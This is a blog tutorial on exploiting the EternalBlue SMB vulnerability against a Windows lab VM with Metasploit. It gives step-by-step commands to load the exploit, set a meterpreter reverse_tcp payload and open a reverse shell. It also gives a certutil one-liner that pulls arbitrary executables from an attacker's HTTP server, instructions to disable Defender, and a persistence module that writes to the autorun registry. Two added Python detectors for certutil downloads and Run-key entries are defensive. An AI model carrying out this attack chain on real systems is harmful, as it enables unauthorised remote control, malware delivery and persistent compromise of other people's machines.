Exploiting Windows SMB Module Vulnerability using “Eternal Blue” Exploit, Metasploit.

Muhammad Huzaifa
Feb 27, 2023


Gaining remote access to another operating system is, for a penetration tester, like a dream come true. This blog will cover exploiting the very famous and common vulnerability “Eternal Blue” to get a reverse shell on a Windows system and remotely execute commands and payloads on the target machine using the Metasploit framework. Before getting to the exploitation phase, let’s have a look at what Eternal Blue really is.

What is Eternal Blue?

Eternal Blue is an exploit developed by the United States’ National Security Agency and revealed by a group of hackers who went by the name “Shadow Brokers” on April 14, 2017. Different versions of Windows, i.e., Windows Vista, 7, 8.1, RT 8.1, Windows Server 2008, 2008 R2, 2012, 2012 R2 and even Windows 10, are vulnerable to this exploit. So, how does it work? Eternal Blue exploits a vulnerability in the implementation of the SMB (Server Message Block) module, tricking it into accepting malicious packets as legitimate network traffic. Now that we have an understanding of how this exploit works, let’s get to the practical exploitation phase.

Pre-Requisites

1- Any version of Windows, either 10, 8.1, 7 or Windows Server 2008 or 2012, acting as your target VM.

2- Kali Linux with an updated Metasploit Framework.

3- Both virtual environments need to run at the same time, so a minimum of 8 GB of RAM is a must.

Note:

Use only virtual environments for this exploitation and not your own host machines. For this blog I will be using Windows 7 as my target virtual environment and Kali Linux 2022 as my attack box; however, you can use any Windows machine from the ones mentioned above.

Disclaimer

It is clearly stated that this blog may only be used for educational purposes and by penetration testing enthusiasts, and the author of this blog will not be responsible for any malicious activities carried out using the information provided in this blog.

Getting Started

The very first step is to open both of your virtual environments and set them to bridged adapters. Since we are not going to use any third-party software like Ngrok, we should have both of our VMs on the bridged network.

Click Settings -> Click Network -> Set Bridged Adapter

After starting Windows, first of all turn Windows Defender off to avoid any confusion later. You can follow the following short YouTube video on how to turn off Defender if you don’t already know how:

Windows® 7: How to turn off the security on Windows® 7-based PC — YouTube

Now run the following command on your Kali Linux machine to start Metasploit Framework:

“msfconsole”

Your Metasploit framework should start running and you should see something like this:

It may take some time at first, so just let the framework start.

Now, when the framework is up, search for the Eternal Blue vulnerability and any exploit related to it using the following command:

“search eternal” or “search eternal blue”

You will see a few exploits related to this vulnerability, as shown in the screenshot below:

Now that we know that the exploit we are pursuing targets the SMB module of the Windows architecture, pick the first exploit with id 0 highlighted in the screenshot above and load it with the “use” command to get into the exploit module:

“use exploit/windows/smb/ms17_010_eternalblue”

Now you should have entered the exploit module as shown below:

The first thing to do after entering the module is to check the module options to see what features the exploit already provides. For this purpose, use the “show options” command.

Remember this boxed Payload option; it will be used when setting the payload later.

You can see a number of options the exploit already provides that can be set in order to run it. The good thing is we don’t need to set all of them. We just need to set the target, the remote host (IP address of your Windows VM) and the payload for the exploit to work, and then run it.

“set target 0”

“set RHOSTS <IP address of your bridged Windows VM>”

Now, if you have any issue (if after using the remote host command your connection is not set up), use the “set LHOST” command to set the local address for Windows to connect back to, and the “set LPORT” command to set the port.

set LHOST <your Kali’s IP Address>

set LPORT <open port number to listen for connection>

Now the last step is to set the payload for the exploit. If you remember, we highlighted a payload in the show options output above. Copy that payload and use it with the following command:

“set payload windows/x64/meterpreter/reverse_tcp”

Now just simply run the exploit using either

“exploit” or “run”

command. The exploit should start listening on the set port for the remote host you set above, as shown below:

Voila! We got connected to Windows through a reverse shell; as you can see in the screenshot below, we have established a meterpreter session with Windows. You can use the help command to check the meterpreter commands available for Windows:

Now, the first step after opening a session to Windows is using the “shell” command to get a raw shell of the operating system you have connected to.

Now you can get any command executed on the target Windows machine, as I have used the “sysinfo” command here to get system information.

There is an unlimited number of commands you can now use on the target system. Furthermore, you can easily download any file, either malicious or benign, onto the target system. Just create your Python HTTP server using the command:

“python -m http.server 4444”

Place any files in the directory served by this HTTP server and use the following command in the shell you opened from your meterpreter session to download one onto the target machine:

“certutil.exe -urlcache -f http://<IP address of Kali>:4444/<anyfile.exe> <anyfile.exe>”

Here 4444 is the port set in the http.server command above, the URL path is the file you placed in the served directory, and the last argument is the name the file is saved under on the target.
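Defenders on the receiving end of this step look for exactly this pattern: certutil.exe being used as a downloader. As an added example, not part of the original post and not Metasploit code, here is a small Python detector run over constructed Sysmon-style process-creation records; the IP 192.0.2.10, the file names and the log format are made up for the example.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields joined
# with "|"): sample data for this example, not logs from a real host. The last
# two lines carry the certutil download used in this post.
SAMPLE_EVENTS = [
    "Image: C:\\Windows\\System32\\cmd.exe|CommandLine: cmd.exe /c whoami",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil -hashfile C:\\Tools\\setup.exe SHA256",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: certutil.exe -urlcache -f http://192.0.2.10:4444/anyfile.exe anyfile.exe",
    "Image: C:\\Windows\\System32\\certutil.exe|CommandLine: \"C:\\Windows\\System32\\certutil.exe\" /URLCACHE /split /f https://192.0.2.10:4444/payload.bin C:\\Users\\Public\\p.bin",
]

URL_RE = re.compile(r"^(?:https?|ftp)://\S+$", re.IGNORECASE)

def parse_event(line):
    """Split 'Field: value|Field: value' into a dict, using the first ': ' per field."""
    return dict(part.split(": ", 1) for part in line.split("|"))

def tokenize(cmdline):
    """Windows-style split: quoted spans stay whole, surrounding quotes are dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def detect_certutil_download(event):
    """Return a finding when certutil fetches a URL via -urlcache, else None.
    Benign uses such as -hashfile are ignored; '-' and '/' switches and any
    letter case are accepted, as certutil itself accepts them."""
    tokens = tokenize(event.get("CommandLine", ""))
    if not tokens or not tokens[0].lower().rsplit("\\", 1)[-1].startswith("certutil"):
        return None
    switches = {t.lstrip("-/").lower() for t in tokens[1:] if t.startswith(("-", "/"))}
    urls = [t for t in tokens[1:] if URL_RE.match(t)]
    if "urlcache" not in switches or not urls:
        return None
    # The positional argument left after the URL is the file certutil writes to disk.
    positional = [t for t in tokens[1:] if not t.startswith(("-", "/")) and not URL_RE.match(t)]
    return {"url": urls[0],
            "output": positional[-1] if positional else None,
            "split": "split" in switches}  # -split saves the raw body, a common variant

def scan(events):
    """Run the detector over raw event lines; attach the image path to each finding."""
    findings = []
    for line in events:
        event = parse_event(line)
        hit = detect_certutil_download(event)
        if hit:
            hit["image"] = event.get("Image")
            findings.append(hit)
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags only the two download lines and leaves the -hashfile use alone.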

Persistence

There are many cases where the meterpreter session gets disconnected when the target machine reboots. To stop this we have a really beautiful module in the Metasploit framework that goes by “persistence”. This module adds the file provided at the path set in the module to the autorun registry of the target machine, so even if the target reboots, the payload on the target machine tries to connect back to the meterpreter session every ___ seconds. These seconds are also set in the persistence module.

First of all, background your current session using the “background” command to get back to the msf shell, and use the following commands to enter the persistence module:

“use exploit/windows/local/persistence”

“show options”

Now you can set the file you want to add to the autorun registry, the path to the file, the delay in seconds after which the victim will try to reconnect to the session, and the session id with which the victim will connect. Use the following commands:

“set DELAY 30” ; try to connect every 30 seconds

“set EXE_NAME <file you want to add to autorun>”

“set PATH <path to the file to add to autorun>”

“set SESSION <id of the active meterpreter session, usually 1>”

Then run the module and wait for the exploit to complete.

Now interact with your active meterpreter session using the “sessions -i <session id>” command and “reboot” the target system. You will see that even after rebooting the system, your meterpreter still has an active connection with your target system.
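The autorun entry this module leaves behind is also what a defender should be auditing on the target. As an added example that is not part of the original post or of Metasploit, here is a Python audit over constructed `reg query` output of the HKCU Run key, flagging values that launch a script or run from a temp directory; the value names and paths are made up for the example.

```python
import re

# Constructed `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output: sample data for this example, not captured from a real host. The last
# two values are the kind of entry a logon-persistence module leaves behind.
SAMPLE_REG_QUERY = r"""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Discord    REG_EXPAND_SZ    %LOCALAPPDATA%\Discord\Update.exe --processStart Discord.exe
    fKsJHEbUp    REG_SZ    C:\Users\alice\AppData\Local\Temp\GjnBCyQ.vbs
    Updater    REG_SZ    wscript.exe //B C:\Users\Public\svc.vbs
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")

def parse_reg_query(text):
    """Turn `reg query` value lines ('    name    REG_TYPE    data') into dicts."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"^\s+(.+?)\s+(REG_[A-Z_]+)\s+(.*)$", line)
        if m:
            entries.append({"name": m.group(1), "type": m.group(2), "data": m.group(3).strip()})
    return entries

def target_of(data):
    """Resolve what actually runs: the program itself, or the script handed to a
    script host such as wscript.exe (switches like //B are skipped)."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', data)]
    if not tokens:
        return ""
    if tokens[0].lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        args = [t for t in tokens[1:] if not t.startswith(("/", "-"))]
        return args[0] if args else tokens[0]
    return tokens[0]

def audit_run_key(text):
    """Flag Run values that launch a script or run from a temp directory.
    Ordinary software in AppData (OneDrive, Discord) is left alone."""
    findings = []
    for entry in parse_reg_query(text):
        target = target_of(entry["data"]).lower()
        reasons = []
        if target.endswith(SCRIPT_EXTS):
            reasons.append("script launched at logon")
        if re.search(r"%temp%|%tmp%|\\temp\\", target):
            reasons.append("runs from a temp directory")
        if reasons:
            findings.append({"name": entry["name"], "target": target, "reasons": reasons})
    return findings
```

`audit_run_key(SAMPLE_REG_QUERY)` reports the two script entries and nothing for the regular applications.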

Conclusion

This blog shows how easy the Metasploit framework makes it to exploit common vulnerabilities, and Eternal Blue is not the only vulnerability that is this easy to exploit using this framework. There are many others like “netapi” and other auxiliary exploits. This shows how vulnerable today’s systems still really are and how one can make use of these vulnerabilities to get his/her way with another’s operating system.
